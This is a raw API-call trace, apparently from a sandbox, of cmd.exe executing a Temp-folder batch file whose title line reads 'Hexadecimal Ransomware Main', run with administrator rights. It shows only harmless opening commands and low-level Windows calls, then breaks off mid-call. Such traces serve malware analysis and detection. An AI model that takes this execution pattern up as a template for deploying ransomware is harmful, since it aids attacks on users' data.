(_String1="shift", _String2="SHIFT") returned 0 [0100.253] GetConsoleTitleW (in: lpConsoleTitle=0x407419eca0, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0100.388] malloc (_Size=0xffce) returned 0x1dc257f0140 [0100.389] ??_V@YAXPEAX@Z () returned 0x1dc257f0140 [0100.390] malloc (_Size=0xffce) returned 0x1dc25800120 [0100.390] ??_V@YAXPEAX@Z () returned 0x1dc25800120 [0100.391] _wcsicmp (_String1="shift", _String2="DIR") returned 15 [0100.391] _wcsicmp (_String1="shift", _String2="ERASE") returned 14 [0100.391] _wcsicmp (_String1="shift", _String2="DEL") returned 15 [0100.391] _wcsicmp (_String1="shift", _String2="TYPE") returned -1 [0100.391] _wcsicmp (_String1="shift", _String2="COPY") returned 16 [0100.391] _wcsicmp (_String1="shift", _String2="CD") returned 16 [0100.391] _wcsicmp (_String1="shift", _String2="CHDIR") returned 16 [0100.391] _wcsicmp (_String1="shift", _String2="RENAME") returned 1 [0100.391] _wcsicmp (_String1="shift", _String2="REN") returned 1 [0100.391] _wcsicmp (_String1="shift", _String2="ECHO") returned 14 [0100.391] _wcsicmp (_String1="shift", _String2="SET") returned 3 [0100.391] _wcsicmp (_String1="shift", _String2="PAUSE") returned 3 [0100.391] _wcsicmp (_String1="shift", _String2="DATE") returned 15 [0100.391] _wcsicmp (_String1="shift", _String2="TIME") returned -1 [0100.391] _wcsicmp (_String1="shift", _String2="PROMPT") returned 3 [0100.391] _wcsicmp (_String1="shift", _String2="MD") returned 6 [0100.391] _wcsicmp (_String1="shift", _String2="MKDIR") returned 6 [0100.391] _wcsicmp (_String1="shift", _String2="RD") returned 1 [0100.391] _wcsicmp (_String1="shift", _String2="RMDIR") returned 1 [0100.392] _wcsicmp (_String1="shift", _String2="PATH") returned 3 [0100.392] _wcsicmp (_String1="shift", _String2="GOTO") returned 12 [0100.392] _wcsicmp (_String1="shift", _String2="SHIFT") returned 0 [0100.392] ??_V@YAXPEAX@Z () returned 0x1 [0100.392] GetProcessHeap () returned 0x1dc256b0000 [0100.392] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x20) returned 0x1dc256b1640 [0100.392] GetProcessHeap () returned 0x1dc256b0000 [0100.392] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256b1640, Size=0x1a) returned 0x1dc256b1640 [0100.392] GetProcessHeap () returned 0x1dc256b0000 [0100.392] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256b1640) returned 0x1a [0100.392] GetProcessHeap () returned 0x1dc256b0000 [0100.392] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x24) returned 0x1dc256b8bc0 [0100.392] ??_V@YAXPEAX@Z () returned 0x1 [0100.393] _get_osfhandle (_FileHandle=1) returned 0x50 [0100.393] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x7) returned 1 [0100.489] _get_osfhandle (_FileHandle=1) returned 0x50 [0100.489] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0x7ff67b90fc08 | out: lpMode=0x7ff67b90fc08) returned 1 [0100.577] _get_osfhandle (_FileHandle=0) returned 0x4c [0100.577] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x7ff67b90fc0c | out: lpMode=0x7ff67b90fc0c) returned 1 [0100.647] SetConsoleInputExeNameW () returned 0x1 [0100.647] GetConsoleOutputCP () returned 0x1b5 [0100.752] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff67b90fbb0 | out: lpCPInfo=0x7ff67b90fbb0) returned 1 [0100.752] SetThreadUILanguage (LangId=0x0) returned 0x409 [0100.837] ??_V@YAXPEAX@Z () returned 0x1 [0100.838] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\9BCB.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\9b7b.tmp\\9bba.tmp\\9bcb.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x407419eef8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x98 [0100.839] _open_osfhandle (_OSFileHandle=0x98, _Flags=8) returned 3 [0100.839] _get_osfhandle (_FileHandle=3) returned 0x98 [0100.839] SetFilePointer (in: hFile=0x98, lDistanceToMove=11, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb [0100.839] GetProcessHeap () returned 0x1dc256b0000 [0100.839] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256b8bc0) returned 1 [0100.839] GetProcessHeap () returned 0x1dc256b0000 [0100.839] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256b1640) returned 1 [0100.839] GetProcessHeap () returned 0x1dc256b0000 [0100.839] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256b9260) returned 1 [0100.839] GetProcessHeap () returned 0x1dc256b0000 [0100.839] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256b9920) returned 1 [0100.839] GetProcessHeap () returned 0x1dc256b0000 [0100.839] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bbb30) returned 1 [0100.839] GetProcessHeap () returned 0x1dc256b0000 [0100.839] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bba70) returned 1 [0100.840] _get_osfhandle (_FileHandle=3) returned 0x98 [0100.840] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb [0100.840] ReadFile (in: hFile=0x98, lpBuffer=0x7ff67b909970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x407419eeb0, lpOverlapped=0x0 | out: lpBuffer=0x7ff67b909970*, lpNumberOfBytesRead=0x407419eeb0*=0x1de, lpOverlapped=0x0) returned 1 [0100.840] SetFilePointer (in: hFile=0x98, lDistanceToMove=22, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x16 [0100.840] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff67b909970, cbMultiByte=11, lpWideCharStr=0x7ff67b913c30, cchWideChar=8191 | out: lpWideCharStr="@echo off\r\n") returned 11 [0100.840] _get_osfhandle (_FileHandle=3) returned 0x98 [0100.840] GetFileType (hFile=0x98) returned 0x1 [0100.840] _get_osfhandle (_FileHandle=3) returned 0x98 [0100.840] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x16 [0100.840] GetProcessHeap () returned 0x1dc256b0000 [0100.840] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x4012) returned 0x1dc256bf990 [0100.841] GetProcessHeap () returned 0x1dc256b0000 [0100.841] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bf990) returned 1 [0100.841] GetProcessHeap () returned 0x1dc256b0000 [0100.841] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xb0) returned 0x1dc256bba70 [0100.841] _wcsicmp (_String1="echo", _String2=")") returned 60 [0100.841] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0100.841] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0100.841] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0100.841] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0100.841] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0100.841] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0100.841] GetProcessHeap () returned 0x1dc256b0000 [0100.841] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xb0) returned 0x1dc256bbb30 [0100.841] GetProcessHeap () returned 0x1dc256b0000 [0100.841] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x1a) returned 0x1dc256b9920 [0100.842] GetProcessHeap () returned 0x1dc256b0000 [0100.842] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x1a) returned 0x1dc256b1640 [0100.842] _tell (_FileHandle=3) returned 22 [0100.843] _close (_FileHandle=3) returned 0 [0100.843] malloc (_Size=0xffce) returned 0x1dc257e0160 [0100.844] ??_V@YAXPEAX@Z () returned 0x1dc257e0160 [0100.845] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0100.845] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0100.845] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0100.845] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0100.845] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0100.845] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0100.845] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0100.845] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0100.845] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0100.845] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0100.845] GetConsoleTitleW (in: lpConsoleTitle=0x407419eca0, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0100.924] malloc (_Size=0xffce) returned 0x1dc257f0140 [0100.924] ??_V@YAXPEAX@Z () returned 0x1dc257f0140 [0100.924] malloc (_Size=0xffce) returned 0x1dc25800120 [0100.924] ??_V@YAXPEAX@Z () returned 0x1dc25800120 [0100.925] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0100.925] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0100.925] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0100.925] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0100.925] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0100.925] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0100.925] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0100.925] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0100.925] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0100.925] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0100.925] ??_V@YAXPEAX@Z () returned 0x1 [0100.926] GetProcessHeap () returned 0x1dc256b0000 [0100.926] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x24) returned 0x1dc256b8bc0 [0100.926] GetProcessHeap () returned 0x1dc256b0000 [0100.926] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256b8bc0, Size=0x1a) returned 0x1dc256b8bc0 [0100.926] GetProcessHeap () returned 0x1dc256b0000 [0100.926] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256b8bc0) returned 0x1a [0100.926] GetProcessHeap () returned 0x1dc256b0000 [0100.926] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x24) returned 0x1dc256b8bf0 [0100.926] _wcsnicmp (_String1="off", _String2="off", _MaxCount=0x3) returned 0 [0100.926] ??_V@YAXPEAX@Z () returned 0x1 [0100.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0100.927] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x7) returned 1 [0101.003] _get_osfhandle (_FileHandle=1) returned 0x50 [0101.004] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0x7ff67b90fc08 | out: lpMode=0x7ff67b90fc08) returned 1 [0101.248] _get_osfhandle (_FileHandle=0) returned 0x4c [0101.248] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x7ff67b90fc0c | out: lpMode=0x7ff67b90fc0c) returned 1 [0101.323] SetConsoleInputExeNameW () returned 0x1 [0101.323] GetConsoleOutputCP () returned 0x1b5 [0101.422] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff67b90fbb0 | out: lpCPInfo=0x7ff67b90fbb0) returned 1 [0101.422] SetThreadUILanguage (LangId=0x0) returned 0x409 [0101.510] ??_V@YAXPEAX@Z () returned 0x1 [0101.512] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\9BCB.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\9b7b.tmp\\9bba.tmp\\9bcb.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x407419eef8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x98 [0101.512] _open_osfhandle (_OSFileHandle=0x98, _Flags=8) returned 3 [0101.512] _get_osfhandle (_FileHandle=3) returned 0x98 [0101.512] SetFilePointer (in: hFile=0x98, lDistanceToMove=22, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x16 [0101.512] GetProcessHeap () returned 0x1dc256b0000 [0101.512] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256b8bf0) returned 1 [0101.512] GetProcessHeap () returned 0x1dc256b0000 [0101.512] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256b8bc0) returned 1 [0101.512] GetProcessHeap () returned 0x1dc256b0000 [0101.512] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256b1640) returned 1 [0101.512] GetProcessHeap () returned 0x1dc256b0000 [0101.512] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256b9920) returned 1 [0101.512] GetProcessHeap () returned 0x1dc256b0000 [0101.512] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bbb30) returned 1 [0101.512] GetProcessHeap () returned 0x1dc256b0000 [0101.512] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bba70) returned 1 [0101.512] _get_osfhandle (_FileHandle=3) returned 0x98 [0101.512] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x16 [0101.512] ReadFile (in: hFile=0x98, lpBuffer=0x7ff67b909970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x407419eeb0, lpOverlapped=0x0 | out: lpBuffer=0x7ff67b909970*, lpNumberOfBytesRead=0x407419eeb0*=0x1d3, lpOverlapped=0x0) returned 1 [0101.513] SetFilePointer (in: hFile=0x98, lDistanceToMove=57, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x39 [0101.513] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff67b909970, cbMultiByte=35, lpWideCharStr=0x7ff67b913c30, cchWideChar=8191 | out: lpWideCharStr="title Hexadecimal Ransomware Main\r\n") returned 35 [0101.513] _get_osfhandle (_FileHandle=3) returned 0x98 [0101.513] GetFileType (hFile=0x98) returned 0x1 [0101.513] _get_osfhandle (_FileHandle=3) returned 0x98 [0101.513] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39 [0101.513] GetProcessHeap () returned 0x1dc256b0000 [0101.513] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x4012) returned 0x1dc256bf990 [0101.513] GetProcessHeap () returned 0x1dc256b0000 [0101.513] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bf990) returned 1 [0101.513] _wcsicmp (_String1="title", _String2=")") returned 75 [0101.513] _wcsicmp (_String1="FOR", _String2="title") returned -14 [0101.513] _wcsicmp (_String1="FOR/?", _String2="title") returned -14 [0101.513] _wcsicmp (_String1="IF", _String2="title") returned -11 [0101.513] _wcsicmp (_String1="IF/?", _String2="title") returned -11 [0101.513] _wcsicmp (_String1="REM", _String2="title") returned -2 [0101.513] _wcsicmp (_String1="REM/?", _String2="title") returned -2 [0101.513] GetProcessHeap () returned 0x1dc256b0000 [0101.513] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xb0) returned 0x1dc256bba70 [0101.513] GetProcessHeap () returned 0x1dc256b0000 [0101.513] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x1c) returned 0x1dc256b9920 [0101.514] GetProcessHeap () returned 0x1dc256b0000 [0101.514] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x4a) returned 0x1dc256bec60 [0101.514] _tell (_FileHandle=3) returned 57 [0101.514] _close (_FileHandle=3) returned 0 [0101.514] malloc (_Size=0xffce) returned 0x1dc257e0160 [0101.515] ??_V@YAXPEAX@Z () returned 0x1dc257e0160 [0101.516] _wcsicmp (_String1="title", _String2="DIR") returned 16 [0101.516] _wcsicmp (_String1="title", _String2="ERASE") returned 15 [0101.516] _wcsicmp (_String1="title", _String2="DEL") returned 16 [0101.516] _wcsicmp (_String1="title", _String2="TYPE") returned -16 [0101.516] _wcsicmp (_String1="title", _String2="COPY") returned 17 [0101.516] _wcsicmp (_String1="title", _String2="CD") returned 17 [0101.516] _wcsicmp (_String1="title", _String2="CHDIR") returned 17 [0101.516] _wcsicmp (_String1="title", _String2="RENAME") returned 2 [0101.516] _wcsicmp (_String1="title", _String2="REN") returned 2 [0101.516] _wcsicmp (_String1="title", _String2="ECHO") returned 15 [0101.516] _wcsicmp (_String1="title", _String2="SET") returned 1 [0101.516] _wcsicmp (_String1="title", _String2="PAUSE") returned 4 [0101.516] _wcsicmp (_String1="title", _String2="DATE") returned 16 [0101.516] _wcsicmp (_String1="title", _String2="TIME") returned 7 [0101.516] _wcsicmp (_String1="title", _String2="PROMPT") returned 4 [0101.516] _wcsicmp (_String1="title", _String2="MD") returned 7 [0101.516] _wcsicmp (_String1="title", _String2="MKDIR") returned 7 [0101.516] _wcsicmp (_String1="title", _String2="RD") returned 2 [0101.516] _wcsicmp (_String1="title", _String2="RMDIR") returned 2 [0101.516] _wcsicmp (_String1="title", _String2="PATH") returned 4 [0101.516] _wcsicmp (_String1="title", _String2="GOTO") returned 13 [0101.516] _wcsicmp (_String1="title", _String2="SHIFT") returned 1 [0101.516] _wcsicmp (_String1="title", _String2="CLS") returned 17 [0101.516] _wcsicmp (_String1="title", _String2="CALL") returned 17 [0101.516] _wcsicmp (_String1="title", _String2="VERIFY") returned -2 [0101.517] _wcsicmp (_String1="title", _String2="VER") returned -2 [0101.517] _wcsicmp (_String1="title", _String2="VOL") returned -2 [0101.517] _wcsicmp (_String1="title", _String2="EXIT") returned 15 [0101.517] _wcsicmp (_String1="title", _String2="SETLOCAL") returned 1 [0101.517] _wcsicmp (_String1="title", _String2="ENDLOCAL") returned 15 [0101.517] _wcsicmp (_String1="title", _String2="TITLE") returned 0 [0101.517] GetConsoleTitleW (in: lpConsoleTitle=0x407419eca0, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0101.640] malloc (_Size=0xffce) returned 0x1dc257f0140 [0101.640] ??_V@YAXPEAX@Z () returned 0x1dc257f0140 [0101.640] malloc (_Size=0xffce) returned 0x1dc25800120 [0101.640] ??_V@YAXPEAX@Z () returned 0x1dc25800120 [0101.641] _wcsicmp (_String1="title", _String2="DIR") returned 16 [0101.641] _wcsicmp (_String1="title", _String2="ERASE") returned 15 [0101.641] _wcsicmp (_String1="title", _String2="DEL") returned 16 [0101.641] _wcsicmp (_String1="title", _String2="TYPE") returned -16 [0101.641] _wcsicmp (_String1="title", _String2="COPY") returned 17 [0101.641] _wcsicmp (_String1="title", _String2="CD") returned 17 [0101.641] _wcsicmp (_String1="title", _String2="CHDIR") returned 17 [0101.641] _wcsicmp (_String1="title", _String2="RENAME") returned 2 [0101.641] _wcsicmp (_String1="title", _String2="REN") returned 2 [0101.641] _wcsicmp (_String1="title", _String2="ECHO") returned 15 [0101.641] _wcsicmp (_String1="title", _String2="SET") returned 1 [0101.641] _wcsicmp (_String1="title", _String2="PAUSE") returned 4 [0101.641] _wcsicmp (_String1="title", _String2="DATE") returned 16 [0101.641] _wcsicmp (_String1="title", _String2="TIME") returned 7 [0101.641] _wcsicmp (_String1="title", _String2="PROMPT") returned 4 [0101.641] _wcsicmp (_String1="title", _String2="MD") returned 7 [0101.641] _wcsicmp (_String1="title", _String2="MKDIR") returned 7 [0101.641] _wcsicmp (_String1="title", _String2="RD") returned 2 [0101.641] _wcsicmp (_String1="title", _String2="RMDIR") returned 2 [0101.641] _wcsicmp (_String1="title", _String2="PATH") returned 4 [0101.642] _wcsicmp (_String1="title", _String2="GOTO") returned 13 [0101.642] _wcsicmp (_String1="title", _String2="SHIFT") returned 1 [0101.642] _wcsicmp (_String1="title", _String2="CLS") returned 17 [0101.642] _wcsicmp (_String1="title", _String2="CALL") returned 17 [0101.642] _wcsicmp (_String1="title", _String2="VERIFY") returned -2 [0101.642] _wcsicmp (_String1="title", _String2="VER") returned -2 [0101.642] _wcsicmp (_String1="title", _String2="VOL") returned -2 [0101.642] _wcsicmp (_String1="title", _String2="EXIT") returned 15 [0101.642] _wcsicmp (_String1="title", _String2="SETLOCAL") returned 1 [0101.642] _wcsicmp (_String1="title", _String2="ENDLOCAL") returned 15 [0101.642] _wcsicmp (_String1="title", _String2="TITLE") returned 0 [0101.642] ??_V@YAXPEAX@Z () returned 0x1 [0101.642] GetProcessHeap () returned 0x1dc256b0000 [0101.642] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x84) returned 0x1dc256bbb30 [0101.642] GetProcessHeap () returned 0x1dc256b0000 [0101.642] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256bbb30, Size=0x4a) returned 0x1dc256bbb30 [0101.642] GetProcessHeap () returned 0x1dc256b0000 [0101.643] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256bbb30) returned 0x4a [0101.643] GetProcessHeap () returned 0x1dc256b0000 [0101.643] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x56) returned 0x1dc256bede0 [0101.643] NtOpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x8, OpenAsSelf=0, TokenHandle=0x407419e7e8 | out: TokenHandle=0x407419e7e8*=0x0) returned 0xc000007c [0101.643] NtOpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0x407419e7e8 | out: TokenHandle=0x407419e7e8*=0x98) returned 0x0 [0101.643] NtQueryInformationToken (in: TokenHandle=0x98, TokenInformationClass=0x12, TokenInformation=0x407419e798, TokenInformationLength=0x4, ReturnLength=0x407419e7a0 | out: TokenInformation=0x407419e798, ReturnLength=0x407419e7a0) returned 0x0 [0101.643] NtQueryInformationToken (in: TokenHandle=0x98, TokenInformationClass=0x1a, TokenInformation=0x407419e7a0, TokenInformationLength=0x4, ReturnLength=0x407419e798 | out: TokenInformation=0x407419e7a0, ReturnLength=0x407419e798) returned 0x0 [0101.643] NtClose (Handle=0x98) returned 0x0 [0101.643] FormatMessageW (in: dwFlags=0x1900, lpSource=0x0, dwMessageId=0x40002748, dwLanguageId=0x0, lpBuffer=0x407419e7b0, nSize=0x0, Arguments=0x407419e7b8 | out: lpBuffer="쒠╫ǜ") returned 0xf [0101.901] GetProcessHeap () returned 0x1dc256b0000 [0101.901] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x218) returned 0x1dc256bc4d0 [0101.903] SetConsoleTitleW (lpConsoleTitle="Administrator: Hexadecimal Ransomware Main") returned 1 [0101.978] GetProcessHeap () returned 0x1dc256b0000 [0101.978] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bc4d0) returned 1 [0101.978] LocalFree (hMem=0x1dc256bc4a0) returned 0x0 [0101.978] ??_V@YAXPEAX@Z () returned 0x1 [0101.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0101.980] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x7) returned 1 [0102.008] _get_osfhandle (_FileHandle=1) returned 0x50 [0102.008] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0x7ff67b90fc08 | out: lpMode=0x7ff67b90fc08) returned 1 [0102.031] _get_osfhandle (_FileHandle=0) returned 0x4c [0102.031] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x7ff67b90fc0c | out: lpMode=0x7ff67b90fc0c) returned 1 [0102.043] SetConsoleInputExeNameW () returned 0x1 [0102.043] GetConsoleOutputCP () returned 0x1b5 [0102.071] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff67b90fbb0 | out: lpCPInfo=0x7ff67b90fbb0) returned 1 [0102.071] SetThreadUILanguage (LangId=0x0) returned 0x409 [0102.253] ??_V@YAXPEAX@Z () returned 0x1 [0102.254] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\9BCB.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\9b7b.tmp\\9bba.tmp\\9bcb.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x407419eef8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x94 [0102.255] _open_osfhandle (_OSFileHandle=0x94, _Flags=8) returned 3 [0102.255] _get_osfhandle (_FileHandle=3) returned 0x94 [0102.255] SetFilePointer (in: hFile=0x94, lDistanceToMove=57, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x39 [0102.255] GetProcessHeap () returned 0x1dc256b0000 [0102.255] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bede0) returned 1 [0102.255] GetProcessHeap () returned 0x1dc256b0000 [0102.255] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bbb30) returned 1 [0102.255] GetProcessHeap () returned 0x1dc256b0000 [0102.255] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bec60) returned 1 [0102.255] GetProcessHeap () returned 0x1dc256b0000 [0102.255] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256b9920) returned 1 [0102.255] GetProcessHeap () returned 0x1dc256b0000 [0102.255] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bba70) returned 1 [0102.255] _get_osfhandle (_FileHandle=3) returned 0x94 [0102.255] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39 [0102.255] ReadFile (in: hFile=0x94, lpBuffer=0x7ff67b909970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x407419eeb0, lpOverlapped=0x0 | out: lpBuffer=0x7ff67b909970*, lpNumberOfBytesRead=0x407419eeb0*=0x1b0, lpOverlapped=0x0) returned 1 [0102.256] SetFilePointer (in: hFile=0x94, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0102.256] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff67b909970, cbMultiByte=6, lpWideCharStr=0x7ff67b913c30, cchWideChar=8191 | out: lpWideCharStr="tree\r\nHexadecimal Ransomware Main\r\n") returned 6 [0102.257] _get_osfhandle (_FileHandle=3) returned 0x94 [0102.257] GetFileType (hFile=0x94) returned 0x1 [0102.257] _get_osfhandle (_FileHandle=3) returned 0x94 [0102.257] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0102.257] GetProcessHeap () returned 0x1dc256b0000 [0102.257] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x4012) returned 0x1dc256bf990 [0102.257] GetProcessHeap () returned 0x1dc256b0000 [0102.257] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bf990) returned 1 [0102.257] _wcsicmp (_String1="tree", _String2=")") returned 75 [0102.257] _wcsicmp (_String1="FOR", _String2="tree") returned -14 [0102.257] _wcsicmp (_String1="FOR/?", _String2="tree") returned -14 [0102.257] _wcsicmp (_String1="IF", _String2="tree") returned -11 [0102.257] _wcsicmp (_String1="IF/?", _String2="tree") returned -11 [0102.257] _wcsicmp (_String1="REM", _String2="tree") returned -2 [0102.257] _wcsicmp (_String1="REM/?", _String2="tree") returned -2 [0102.258] GetProcessHeap () returned 0x1dc256b0000 [0102.258] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xb0) returned 0x1dc256bba70 [0102.258] GetProcessHeap () returned 0x1dc256b0000 [0102.258] RtlAllocateHeap 